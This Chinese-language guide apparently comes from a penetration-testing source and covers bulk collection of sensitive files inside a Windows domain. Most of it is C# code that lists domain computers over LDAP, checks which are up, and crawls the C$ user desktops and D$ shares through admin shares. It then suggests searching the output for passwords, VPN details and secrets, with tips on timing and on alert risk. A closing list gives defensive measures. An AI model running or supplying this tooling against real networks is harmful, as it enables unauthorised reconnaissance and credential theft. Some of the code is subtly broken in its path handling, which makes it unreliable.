域内批量获取敏感文件
字数 688 2025-08-26 22:11:28
域内批量获取敏感文件技术指南
概述
本技术文档详细介绍了在Windows域环境中批量获取敏感文件的方法,特别是针对Linux机器只开放SSH端口或无法通过常规Web渗透进入的情况。通过自动化工具可以高效地收集域内桌面文件,避免手动逐台检查的高成本操作。
技术实现步骤
0x01 批量获取域内机器名
方法1:使用net命令
net group "domain computers" /do
缺点:输出格式为3个机器名一排,需要额外处理空格。
方法2:通过LDAP查询(推荐)
public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;
url = "LDAP://" + ip;
username = domain user;
password = domain pass;
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))";
foreach (SearchResult r in Ldapcoon.search.FindAll()) {
string computername = "";
computername = r.Properties["cn"][0].ToString();
Console.WriteLine(computername);
}
0x02 机器存活探测
- 将获取的机器名存入machine.txt并逐行读取:
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream){
string machine = machine_name.ReadLine();
Console.WriteLine(machine);
}
- 使用Ping检测机器存活状态:
public static bool IsMachineUp(string hostName) {
bool retVal = false;
try {
Ping pingSender = new Ping();
PingOptions options = new PingOptions();
options.DontFragment = true;
string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
byte[] buffer = Encoding.ASCII.GetBytes(data);
int timeout = 800;
PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
if (reply.Status == IPStatus.Success) {
retVal = true;
}
} catch (Exception ex) {
retVal = false;
}
return retVal;
}
- 结合机器名读取和存活检测:
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream){
try {
string machine = machine_name.ReadLine();
if (IsMachineUp(machine)) {
// 执行后续操作
}
} catch {
// 异常处理
}
}
0x03 获取桌面文件
目录结构设计:
TargetDesktopinfos
├── 机器1
│ ├── 用户A
│ │ └── desktop.txt
│ └── 用户B
│ └── desktop.txt
└── 机器2
├── 用户C
│ └── desktop.txt
└── 用户D
└── desktop.txt
实现步骤:
- 创建结果目录:
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);
- 获取目标机器的用户目录:
string userpath = machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath)) {
// 创建机器名文件夹
string MachineFolder = DesktopFiles + machine;
Directory.CreateDirectory(MachineFolder);
- 遍历用户目录并处理桌面文件:
foreach (string user in user_list) {
string DesktopDirectoryPath = user + "\\desktop";
string username = substring(user); // 自定义提取用户名方法
if (Directory.Exists(DesktopDirectoryPath)) {
// 创建用户名文件夹
string UserFolder = MachineFolder + username;
Directory.CreateDirectory(UserFolder);
// 创建desktop.txt文件
string Desktoptxt = UserFolder + "\\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();
// 获取桌面所有文件(包括子目录)
string[] AllFiles = Directory.GetFileSystemEntries(
DesktopDirectoryPath,
"*",
SearchOption.AllDirectories
);
foreach (string file in AllFiles) {
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(Desktoptxt, writeFileTo);
}
}
}
0x04 获取D盘文件(扩展)
public static void D() {
try {
string DFiles = "";
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream) {
try {
string machine = machine_name.ReadLine();
if (IsMachineUp(machine)) {
string currentpath = Directory.GetCurrentDirectory();
DFiles = currentpath + "\\DInfos";
Directory.CreateDirectory(DFiles);
string dpath = machine + @"\d$";
var d_list = Directory.EnumerateDirectories(dpath);
if (Directory.Exists(dpath)) {
string MachineFolder = DFiles + machine;
Directory.CreateDirectory(MachineFolder);
string E_txt = MachineFolder + "\\dFiles.txt";
StreamWriter sw = File.CreateText(E_txt);
sw.Close();
try {
// 处理D盘根目录文件
var files = Directory.GetFiles(dpath);
foreach (string file in files) {
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(E_txt, writeFileTo);
}
// 处理D盘子目录
var directorys = Directory.EnumerateDirectories(dpath);
foreach (string directory in directorys) {
if (!directory.Contains("System Volume Information")) {
string[] AllFiles = Directory.GetFileSystemEntries(
directory,
"*",
SearchOption.AllDirectories
);
foreach (string file in AllFiles) {
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(E_txt, writeFileTo);
}
}
}
} catch (UnauthorizedAccessException ex) {
// 权限不足处理
}
}
}
} catch {
// 异常处理
}
}
machine_name.Close();
} catch {
// 异常处理
}
}
结果利用
收集完成后,可以在生成的目录结构中搜索敏感关键词如:
- password
- vpn
- credentials
- secret
- config
注意事项
- 权限要求:执行此操作需要域用户具有足够的权限访问目标机器的C\(和D\)共享
- 网络限制:确保网络策略允许ICMP(Ping)和SMB访问
- 时间考虑:IT工作机可能在非工作时间关机,建议在工作时间执行
- 隐蔽性:大规模文件访问可能触发安全告警
- 异常处理:代码中应妥善处理各种异常情况(权限不足、路径不存在等)
防御建议
- 限制共享目录的访问权限
- 监控异常的大规模文件访问行为
- 实施最小权限原则
- 定期审计域内账户权限
- 启用并监控SMB访问日志
通过以上方法,可以高效地在域环境中批量收集敏感文件,为后续渗透测试提供有价值的信息。